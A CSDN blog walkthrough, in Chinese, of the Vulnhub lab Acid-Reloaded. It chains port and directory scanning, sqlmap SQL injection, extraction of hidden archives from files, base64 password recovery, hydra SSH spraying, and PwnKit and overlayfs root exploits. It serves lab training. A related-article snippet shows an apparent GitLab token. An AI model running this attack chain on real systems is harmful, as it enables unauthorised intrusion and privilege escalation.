[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+Overlayfs权限提升

最新推荐文章于 2024-07-25 17:27:32 发布
最新推荐文章于 2024-07-25 17:27:32 发布
阅读量201 收藏 3
点赞数 3
分类专栏: Vulnhub 文章标签: 网络
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140688155
版权

信息收集

IP AddressOpening Ports
192.168.101.158TCP:22,33447

$ nmap -p- 192.168.101.158 --min-rate 1000 -sC -sV

Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 cb:47:92:da:ea:b8:d3:82:16:22:0d:a5:5f:05:47:51 (DSA)
|   2048 fd:93:9d:28:57:fb:ef:e0:8e:f1:93:66:03:67:35:50 (RSA)
|   256 a0:a6:52:fb:2c:32:b7:08:b4:ed:61:1d:2d:fa:c8:58 (ECDSA)
|_  256 85:5b:0b:e1:b0:ad:6a:d3:9e:8f:da:38:e5:bd:69:2f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

本地权限

$ ssh acid@192.168.101.158

image.png

image-1.png

http://192.168.101.158:33447/

image-2.png

$ dirb http://192.168.101.158:33447/

image-3.png

http://192.168.101.158:33447/bin/index.php

image-4.png

$ gobuster dir -u "http://192.168.101.158:33447/bin" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php

image-5.png

http://192.168.101.158:33447/bin/dashboard.php

image-6.png

Referer : http://192.168.101.158:33447/bin/includes/validation.php

image-7.png

image-8.png

点击后来到页面

image-9.png

$ arjun -u http://192.168.101.158:33447/bin/l33t_haxor.php

image-10.png

http://192.168.101.158:33447/bin/l33t_haxor.php?id=1

image-11.png

$ sqlmap -u "http://192.168.101.158:33447/bin/l33t_haxor.php?id=1" --dbs --tamper=space2comment --batch

image-12.png

$ sqlmap -u "http://192.168.101.158:33447/bin/l33t_haxor.php?id=1" -D secure_login --tables --tamper=space2comment --batch

image-13.png

http://192.168.101.158:33447/UB3R/strcpy.exe

$ binwalk strcpy.exe

image-19.png

$ foremost strcpy.exe

foremost 是一个数据恢复工具,用于从设备、文件系统、或文件中恢复被删除的文件。它是一个命令行工具,最初是由美国空军计算机取证实验室开发的,用于从磁盘图像中恢复文件。foremost 通过识别文件头(headers)、文件中间的数据块和文件尾(footers)来实现文件恢复。

$ cd output

$ cat audit.txt

image-15.png

$ cd rar

$ unrar x 00000213.rar

image-16.png

$ cat acid.txt

image-17.png

$ binwalk lol.jpg

检测到包含RAR数据

image-18.png

$ unrar e lol.jpg

image-20.png

$ cat hint.txt
$ cat Avinash.contact

image-21.png

AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=

$ echo 'AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA='|base64 -d

image-22.png

password:NooB@123

$ hydra -L /usr/share/wordlists/rockyou.txt -p 'NooB@123' ssh://192.168.101.158 -t 24

image-23.png

username:makke
password:NooB@123

image-24.png

权限提升

Pkexec

makke@acid:~$ find / -perm -4000 -type f 2>null

image-26.png

makke@acid:/tmp$ nc -lvnp 10033 >PwnKit.c

makke@acid:/tmp$ gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

makke@acid:/tmp$ ./PwnKit

image-25.png

Overlayfs

makke@acid:/etc$ cd /bin
makke@acid:/bin$ ./overlayfs

image-27.png

OverlayFS 的工作原理

  • OverlayFS 通过将一个文件系统(称为 lower layer)叠加到另一个文件系统(称为 upper layer)上来创建一个联合视图。它的工作原理如下:

  • Upper Layer: 这是一个可写的文件系统,通常是一个临时的层(如 RAM 磁盘),用于存储修改和新增的文件。

  • Lower Layer: 这是一个只读的文件系统,通常包含基础系统文件或软件包。

  • Merged View: 用户访问的是两个层的联合视图,所有的文件和目录看起来好像在一个单一的文件系统中。

Flag

# cat /root/.flag.txt

image-28.png

Black@Current@Ice-Cream

Мартин.
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SonarQube(sonar-scanner)+GitLab(gitlab-runner)实现提交代码自动扫描项目代码
万物皆可学
06-24 1494
依次输入:地址(http://git.hkeasyspeed.com/)、token(DGmZzRF7dk1p1JPwcu8A )、描述(report)、标签(report)、执行方式(docker)、镜像(sonarsource/sonar-scanner-cli:latest)1.新增项目的时候,我们可以直接忽略第一步直接点击继续,我们跑的是docker不是maven扫描不用修改pom.xml文件。点击左侧的CI/CD - 编辑器 ,默认是没有gitlab-ci的yml文件,我们点击新建。
spring cloud+cicd[gitlabci-runner]+docker-compose 微服务框架
wuqingsssss的博客
09-07 843
文章目录spring boot 小微服务框架-docker-composeeurekaapollodocker/docker-composeDocker 资源限制之内gitlabgitlab仓库直接使用docker-registry搭建Harbor镜像私仓cicdgitlabci-runner注册Runnersrunner-shellrunner-dockerdocker开启认证的远程端口2376ci docker 模式中使用docker远程执行shell部署ssh证书登录(密钥创建与用户设置).gitla
Gitlab-runner安装+注册+移除
冰糖的博客
09-09 3306
不得不说gitlab官方的文档还是做得不错的,基本都可以在官网找到解决方案。 Gitlab-runner安装,注册,移除安装runner注册runner移除runner 安装runner 官网有现成的命令,个人比较喜欢docker安装,以下是一个基本的docker-compose配置 version: "3.8" services: gitlab-ruuner: image: gitlab/gitlab-runner:alpine-v14.2.0 container_name: gitl
Kodi皮肤乱码改中文设置-Arctic: Zephyr- Reloaded
m0_58801267的博客
02-07 4765
乱码的界面有的位置是看不出有键位的直接按下面说的位置点击就好 一、第一页面左边倒数第二个键 二、第二页面左上角第一个键位置 三、第三页面右边第二列正数第五个或倒数第二个键位 ...
CxBx-Reloaded-QT-GUI:最初尝试使用QT为CxBx-Reloaded创建新的GUI
02-05
该项目的发起者希望通过QT的灵活性和强大的功能,提升CxBx-Reloaded的用户体验,使之更加友好且易于操作。 首先,我们来了解CxBx-Reloaded。这是一款开源的Xbox游戏模拟器,由C++编写,它能够使用户在非Xbox平台上...
Carry-Stacker-Reloaded:发薪日2 BLT Mod
05-16
"Carry-Stacker-Reloaded: 发薪日2 BLT Mod" 是一个针对流行的第一人称射击游戏《Payday 2》的第三方模组。这个模组是基于BLT(Black Market Lua Toolkit)进行开发的,BLT是为《Payday 2》设计的一个强大的脚本工具...
pcsx-reloaded-1-9-93_stm32f407_
10-04
标题 "pcsx-reloaded-1-9-93_stm32f407_" 暗示我们正在讨论一个与PCSX Reloaded相关的项目,这是一款著名的PlayStation(PS1)模拟器,用于在个人计算机上运行PS1游戏。这里的"1-9-93"可能是版本号的一部分,而"_stm...
TAKEWAKE-Reloaded:TAKEWAKE Reloaded是C和ASM中的免费爱好操作系统
02-04
TAKEWAKE-Reloaded是一个基于C语言和汇编(ASM)开发的开源操作系统,它专为计算机爱好者设计,提供了一种独特的学习和探索操作系统原理的机会。作为一个自足的项目,TAKEWAKE-Reloaded旨在让开发者深入了解操作系统...
Hyperion-Reloaded:是时候重新加载Hyperion
03-30
“ Hyperion”(海伯利安)是一个在规定的主题(即关于虚拟世界的通用知识)和人物属性(即可以量化的参与游戏机制的数据)以及脚本模版(即结构化的数据形式)的替代下自动代替DM的工具 目录结构 Cards()是用于...
MarkTool之TCP服务端
Qt学视觉
07-24 209
MarkTool之TCP服务端
【ROS2】演示:为有损网络使用服务质量设置
cxyhjl的博客
07-22 790
目录背景先决条件运行演示命令行选项添加网络流量背景请阅读有关 QoS 设置的文档页面,以获取有关 ROS 2 中可用支持的背景信息。在这个演示中,我们将生成一个发布相机图像的节点和另一个订阅图像并在屏幕上显示图像的节点。然后,我们将模拟它们之间的丢包网络连接,并展示不同的服务质量设置如何处理不良链接。先决条件本教程假设您已安装并运行 ROS 2 和 OpenCV。有关安装说明,请...
网络编程套接字socket
安权_code的博客
07-23 899
网络编程中的套接字(socket)是实现网络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
DNS域名管理系统、搭建DNS服务
十四的博客
07-23 883
DNS概述。
H3C与VPN高级应用(七)深入探讨H3C防火墙与VPN高级应用
洛秋的博客
07-23 1080
IPSec(Internet Protocol Security)是一种用于保护IP通信的协议,通过对数据包进行加密和认证来确保数据的机密性、完整性和真实性。IPSec VPN通常用于建立安全的远程连接,保护企业内部网络与远程办公或分支机构之间的数据通信。NAT(Network Address Translation)是一种将私有IP地址转换为公共IP地址的技术,通常用于多个设备共享一个公共IP地址访问互联网。NAT有助于节约公共IP地址,同时增强内部网络的安全性。
通信原理-思科实验五:家庭终端以太网接入Internet实验
sinat_39522506的博客
07-24 254
实验五 家庭终端以太网接入Internet实验。接着配置IP地址池和虚拟模板 开启宽带拨号。1.按照上图选择对应的设备,并连接起来。5.为路由器R1配置静态路由项。7.完成终端PC2 IP配置。
如何保护你的网络安全?
m0_70655343的博客
07-15 1041
这项服务可以抵御复杂的网络威胁,即使在最强烈的攻击下也能保证您的网站服务如常,用户几乎无感知。此外,DDoS高防服务还具备网络应用程序防火墙(WAF),采用实时监控和机器学习来保护用户的资料,防止用户资料被盗,保护服务免遭未经授权的访问,降低个人数据泄露的风险,进而防止数字资产流失。为什么它这么重要呢?打个比方,这就像是你家车库的门开关出了问题,每次你按下按钮,车库门就不停地开关,直到电池耗尽。想象一下,你家的路由器被人利用来发起攻击,就像是你家的水龙头被打开,水不停地流向别人的房子,淹没了他们的院子。
网络编程中的TCP和UDP
小森的博客
07-21 1323
TCP( Transmission control protocol )即传输控制协议,是一种面向连接、可靠的数据传输协议,它是为了在不可靠的互联网上提供可靠的端到端字节流而专门设计的一个传输协议。面向连接:数据传输之前客户端和服务器端必须建立连接可靠的:数据传输是有序的 要对数据进行校验Socket的英文原义是“孔”或“插座”,网络上的两个程序通过一个双向的通信连接实现数据的交换,这个连接的一端称为一个socket。
Hyperledger Fabric 网络体验 - 网络启动过程概览
最新发布
ALONG的博客
07-25 242
作为第一次Fabric网络体验,网络启动主要包含三个操作,分别是生成配置文件、启动网络和操作网络。执行完指令能看到fabric已经启动。
reloaded modules怎么解决
06-06
"reloaded modules" 是指重新加载模块时出现的问题。解决方法可能因情况而异,但以下是一些可能的解决方案: 1. 检查代码中是否有循环依赖。如果有,尝试重构代码以消除循环依赖。 2. 确保在重新加载模块之前,所有对该模块的引用都已被删除。 3. 尝试使用 importlib.reload() 函数重新加载模块。 4. 如果使用了多线程或多进程,确保在重新加载模块时没有其他线程或进程正在使用该模块。 5. 如果使用了缓存,请尝试清除缓存并重新加载模块。 6. 如果问题仍然存在,请检查 Python 版本和操作系统是否与您的代码兼容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值